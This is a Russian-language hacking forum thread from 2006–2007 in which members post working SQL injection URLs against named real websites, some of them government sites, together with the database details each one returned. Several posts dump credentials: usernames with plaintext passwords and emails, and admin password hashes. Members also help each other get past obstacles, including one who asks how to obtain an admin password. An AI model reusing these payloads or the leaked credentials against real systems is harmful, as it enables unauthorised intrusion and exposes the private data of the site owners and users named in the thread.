SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    h__p://mp3.p6.ru/index.php?act=album&id=1121039%20union%20select%201,version(),3,4,5,6,7,8/*
    нашёл случайно, как обычно.
    доступа к mysql нет.
     
    3 people like this.
  2. Booblick

    Booblick New Member

    Joined:
    5 Oct 2007
    Messages:
    2
    Likes Received:
    4
    Reputations:
    0
    http://ont.by/index.php?id_issue=-5+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11/*
    Даальше застрял ребят помогите!
    как выудить пароль на админку к сайту?
    Или, что нибудь замутить с ним
     
    1 person likes this.
  3. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13/*
    [email protected]:5.0.32-Debian_7etch1~bpo.1-log:pille_palle_net
    Code:
    http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,passwort),10,11,12,13+from+PPuser/*
    fundrugs =)
    Code:
    http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12/*
    web59@localhost:5.0.41:usr_web59_4
    Code:
    http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(username,0x3a,passwd,0x3a,email),4,5,6,7,8,9,10,11,12+from+usr_web59_1.tbBenutzer/*
    polinux:123456:p[email protected] polina:12345:p[email protected]:12345:p[email protected]
     
  4. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    //www.interomania.ru - сайт болелов Интера

    есть дырка в news.php, но скрипт от юзера [email protected], доступа никуда кроме z34244_news нет, аналогично со скриптом main.table.php - дырка
    lдоступ к базе z34244_stat

    потом нашлась гостевуха и таблицы с пользователями
    вывод посимвольный
     
    2 people like this.
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Посмотри предыдущий пост до моего.
     
  6. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Tonikk:120853239:2e4b6dc525afb5cb
     
  7. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    код:

    http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+from+user/*

    код:

    http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+from+band/*

    колонки с мылом подобрать не смог,а может ее и нет вовсе?
    p.s особо не искал
     
    #3407 sasTO, 25 Oct 2007
    Last edited: 25 Oct 2007
    3 people like this.
  8. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    turistua.com
    Интернет-магазин товаров для туризма.

    Code:
    http://shop.turistua.com/index.php?x_id=1+union+select+name+from+admin/*
    ____________________________________________________
    ***********************************************
     
    #3408 +StArT+, 25 Oct 2007
    Last edited: 25 Oct 2007
    4 people like this.
  9. -MoLoToK-

    -MoLoToK- Elder - Старейшина

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Code:
    http://www.m-logos.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,version(),user(),7,8,9,database(),11,12,13,14,15,16,17,18,19,20/*
    4.0.27-log///[email protected]///mlogos
     
    #3409 -MoLoToK-, 25 Oct 2007
    Last edited: 25 Oct 2007
  10. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    www.timo4.com
    Code:
    http://www.timo4.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,database(),0x3a,user()),14,15,16,17,18,19,20,21,22,23,24,25,26/*&today=2005.07.27&lang=rus
    4.1.22:timo4:u_timo4@localhost
    Админ:
    Code:
    http://www.timo4.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user,0x3a,pass),14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+limit+0,1/*&today=2005.07.27&lang=rus
    Ardel:50bcc2c899839223f5fb242b8c215d20
     
  11. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    www.job.uralmedia.ru - работа на Урале
    Code:
    http://www.job.uralmedia.ru/index.php3?action=view_vacancy&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),0x3a,database(),0x3a,user()),15,16,17,18,19,20,21,22,23,24,25/*
    4.0.24_Debian-1:job:Chie1heingaephee@localhost
    Таблицы подобрать не смог.
     
  12. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    chelindustry.ru - Предприятия Южного Урала
    Code:
    http://chelindustry.ru/podrob_per.php?id_p=255&rr=-1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7/*
    4.0.26:helg:helg@localhost
    Таблицы не поддаются :mad:
     
    1 person likes this.
  13. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    http://www.volganin.net - универсальная доска объявлений Челябинска
    Code:
    http://www.volganin.net/ind.php?id_typ=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*&regword=id_gorod=59&tr=1
    4.1.14-log:volgani8_base1:volgani8_Alex22@localhost
     
    3 people like this.
  14. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.corporinoquia.gov.co/masinfo.php?id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13/*
    corporin_impacto@localhost:4.1.22-standard:corporin_acg
    Code:
    http://www.fondomixtoculturaquindio.gov.co/vercontenido.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database())/*
    rhisshos_fmixto@localhost:4.1.22-standard-log:rhisshos_fondomixto
    Code:
    http://www.redehospitalbaq.gov.co/ver_noticia.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9/*
    redehco2@localhost:4.1.21:redehospitalbaq_gov_co_-_redehospital
     
    1 person likes this.
  15. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    www.oilworld.ru
    Code:
    http://www.oilworld.ru/tender.php?domain=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/*
    5.0.27-log: oilworld: oilworld@localhost
    62 таблицы:
    Code:
    http://www.oilworld.ru/tender.php?domain=-1+union+select+table_name+from+information_schema.tables+limit+61,1/*
    Юзеры (имя,логин,пасс,мыло):
    Code:
    http://www.oilworld.ru/tender.php?domain=-1+union+select+concat(name,0x3a,login,0x3a,psw,0x3a,email)+from+users+limit+380,1/*
    chelsi.ru - Челябинская служба информации
    Code:
    http://job.chelsi.ru/view_vac.php?id=-1+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    4.1.20-lk-log:chelsiru_job:chelsiru_job@localhost
     
  16. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,USER(),version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    USER: hotrodpi_root@rpweb1p

    Дальше не мог откапать..
     
  17. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    http://www.jetphotos.net/viewphoto.php?id=-6089343+UNION+SELECT+1,2,3,4,5,6,7,table_name,table_schema,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+limit+1,1/*
    Вот дальше. Странно, почему не смог дальше? Пятая версия мускула, не нужно ничего подбирать!
     
  18. sunb0rn

    sunb0rn Member

    Joined:
    5 Sep 2006
    Messages:
    11
    Likes Received:
    7
    Reputations:
    5
    Code:
    http://www.1234567.ru/topic.html?topic=35/**/UNION/**/SELECT/**/1,null,concat(cl_email,char(58),cl_pass)/**/From/**/clients/**/where/**/cl_email/**/like/**/CHAR(37,64,37)/**/limit/**/223403,1/*
     
  19. sunb0rn

    sunb0rn Member

    Joined:
    5 Sep 2006
    Messages:
    11
    Likes Received:
    7
    Reputations:
    5
    а там только две базы - убери table_schema или поставь where table_schema = , и думаю всё получится!
     
    1 person likes this.
  20. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://intercar.com.ua/index.php?id=-19+UNION+SELECT+1,2,version(),USER(),5,6/*
     
Thread Status:
Not open for further replies.